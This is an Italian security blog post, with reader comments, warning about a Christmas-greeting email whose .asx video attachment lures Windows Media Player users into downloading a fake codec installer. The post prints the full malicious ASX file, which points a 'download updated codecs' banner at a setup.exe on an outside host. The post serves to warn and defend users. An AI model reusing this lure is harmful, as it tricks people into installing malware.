Il video di Babbo Natale è un Malware
Pubblicato da Gianni Amato alle 13:15 in Malware, News
Alcuni giorni fa Adriano mi segnala la presenza di un nuovo malware che si spaccia per un file di codec che promette la corretta visualizzazione del video natalizio che arriva come allegato al messaggio di auguri tramite posta elettronica, stile PIO12.
Ecco il messaggio:
Subject: Babbo... natale??
Salve a tutti,
vi mando questo video davvero divertente,
con tantissimi auguri per un felice natale, buone feste e ottimo anno
nuovo!
Allegato: u_naltronatale.asx (1K)
Una volta scaricato ed eseguito con Windows MediaPlayer il file u_naltronatale.asx viene visualizzato il seguente messaggio:
Ovviamente non verrà scaricato un codec ma un file eseguibile Setup.exe con una icona simile al file di installazione dei codec. Di seguito l'icona dell'allegato con estensione .ASX e l'eseguibile:
Cosa contiene il file u_naltronatale.asx
<ASX version="3.0">
<ENTRY>
<TITLE>Impossibile Trovare il Codec</TITLE>
<REF href="http://www.codecsnet.biz/file.avi"/>
<DURATION VALUE="60:00"/>
<BANNER href="http://www.codecsnet.biz/img.gif">
<ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT>
<MOREINFO href="http://www.codecsnet.biz/setup.exe" />
</BANNER>
</ENTRY>
</ASX>
Il file Setup.exe è compresso con exe32pack 1.42 prodotto da SteelBytes
Effetua delle chiamate alle API di Windows per la connessione remota e per installarsi nella macchina della vittima
Al momento non tutti gli antivirus sono in grado di rilevare il malware. Di seguito uno screenshot della scansione online su VirusTotal
(Clicca sull'immagine per ingrandirla) 
Fate attenzione agli allegati che arrivano con i messaggi di auguri e tenete sempre aggiornato il vostro software antivirus.
Vedi anche: Regali e auguri da evitare: Christmas.exe e Cartoline Virtuali
1. Carlo, Sabato 30 Dicembre 2006 ore 08:20
Nonostante abbia più volte effettuato la scansione dei virus ancora non sono riuscito a debellare il famigerato virus che manda gli auguri di natale in mia vece con il famigerato allegato video
Come posso fare per cancellare questo virus?
2. Diego, Mercoledì 31 Gennaio 2007 ore 09:36
A me e' arrivato il messaggio "Filmato Capodanno" il cui testo era "Il video del mio compleanno, indovina chi e' la persona che mi sta a fianco?" contenente un filmato .asx che una volta aperto richiedeva di scaricare il codec.
3. ste, Mercoledì 7 Febbraio 2007 ore 11:51
anche a me è arrivato! e ci sono cascata perchè mi è arrivato nella casella di posta desiderata e per di più dall'indirizzo di un mio conoscente facente parte dei miei contatti!!!
attenzione!
4. andea, Giovedì 8 Febbraio 2007 ore 15:18
proprio oggi mi è arrivata una email con un allegato non conoscevo la trappola cmq il formato dell'allegato: il mio capodanno.asx mi ha insospettito eppoi diceva indovina chi ho accanto.....ma navigando in rete ho scoperto che è un virus...che palle...ma la gente non ha da fare altro che andare a molestare noi poveri utenti di internet?
tempo fa da un sito mi richiedevano di installare un codec bè l'ho fatto sembrava un sito attendibile mcrosoft ecc ecc mah ho nod32 antivirus e x ora mi ha difeso bene spero continui a fare il suo dovere!!boh mah intanto faccio una scansione profonda....
5. Andrea, Venerdì 9 Febbraio 2007 ore 11:04
Oggi mi è arrivata una variante dell'email: Compleanno. Passate le feste, per renderlo credibile utilizzano il compleanno. il testo dell'email ricalca gli altri: "Il video del mio compleanno, indovina chi e' la persona che mi sta a fianco? ". Stesso video con richiesta di installazione codec. Mi chiedo in quanti ci cascheranno?
Ciao
6. Rob, Venerdì 9 Febbraio 2007 ore 13:42
Arrivato anche a me allegato alla mail di un collega. Tra l'altro su una casella postale che uso solo per lavoro e dove finora, da molti anni, non erano mai arrivati virus ne spam. Ci ho fatto una scansione con AVG e non mi ha segnalato nulla. Quindi fidandomi l'ho avviato con WMP ma poi non mi ha chiesto nessun codec e sembra non ci siano problemi. Bho! Cmq è davvero incredibile! mai successo prima!
7. Rob, Venerdì 9 Febbraio 2007 ore 13:44
Arrivato anche a me allegato alla mail di un collega. Tra l'altro su una casella postale che uso solo per lavoro e dove finora, da molti anni, non erano mai arrivati virus ne spam. Ci ho fatto una scansione con AVG e non mi ha segnalato nulla. Quindi fidandomi l'ho avviato con WMP ma poi non mi ha chiesto nessun codec e sembra non ci siano problemi. Bho! Cmq è davvero incredibile! mai successo prima!
8. Toti, Domenica 11 Febbraio 2007 ore 10:57
anche a me è arrivata una mail con testo:
" Il video del mio compleanno,
indovina chi e' la persona che mi sta a fianco? "
e allegato un file "compleanno.asx". Uso AVG e lo ha ricevuto tranquillamente
9. luca, Lunedì 12 Febbraio 2007 ore 21:02
Anche a me è arrivato; non avendo rilevato virus l'ho aperto con winamp ma il video era nero: cioè scorreva ma non c'erano ne' immagini ne' suono. Nessuna richiesta di download di codec.
Sapete se è pericoloso?
Grazie
Luca
10. Cristian, Giovedì 15 Febbraio 2007 ore 13:39
anke a me è arrivato da e-mail che conosco. un mio amico ha installato il codec ma come si può fare a debbellarlo?
11. Gianni Amato, Giovedì 15 Febbraio 2007 ore 19:32
Prova con questo tool webdesk_destroy